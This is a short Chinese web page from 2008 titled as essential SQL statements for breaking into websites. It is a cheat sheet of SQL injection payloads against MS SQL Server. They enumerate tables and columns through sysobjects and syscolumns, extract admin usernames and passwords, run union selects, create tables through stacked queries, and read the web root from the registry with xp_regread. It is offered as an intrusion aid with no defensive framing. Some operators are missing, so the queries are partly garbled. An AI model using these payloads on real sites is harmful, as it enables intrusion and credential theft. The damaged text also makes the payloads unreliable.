入侵网站必备Sql语句:(经典语句)
2008-10-27 16:51:14 来源:WEB开发网and 0 (select top
1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。
and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and
name=admin
and uid>(str (id))) 暴到UID的数值假设为18779569 uid=id
and
0(select top 1 name from bbs.dbo.syscolumns where id=18779569)
得到一个admin的一个字段,假设为 user_id
and 0(select top 1 name from
bbs.dbo.syscolumns where id=18779569 and name not in
(id,...)) 来暴出其他的字段
and 0_id from BBS.dbo.admin where username>1)
可以得到用户名
依次可以得到密码。。。。。假设存在user_id username ,password 等字段
and 0(select count(*) from master.dbo.sysdatabases where得到WEB路径
name>1 and dbid=6)
and 0 (select top 1 name from
bbs.dbo.sysobjects where xtype=U) 得到表名
and 0(select top 1 name from
bbs.dbo.sysobjects where xtype=U and name not in(Address))
and
0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 判断id值
and 0(select top 1 name from
BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select
1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union,access也好用)
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1
swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths
varchar(500)) Declare @test varchar(20) exec master..xp_regread
@rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEMCurrentControlSet
ServicesW3SVCParametersVirtual Roots, @value_name=/, values=@test
OUTPUT insert into paths (path) values(@test)--
;use ku1;--
;create
中查找“入侵网站必备Sql语句:(经典语句)”更多相关内容
中查找“入侵网站必备Sql语句:(经典语句)”更多相关内容更多精彩
赞助商链接
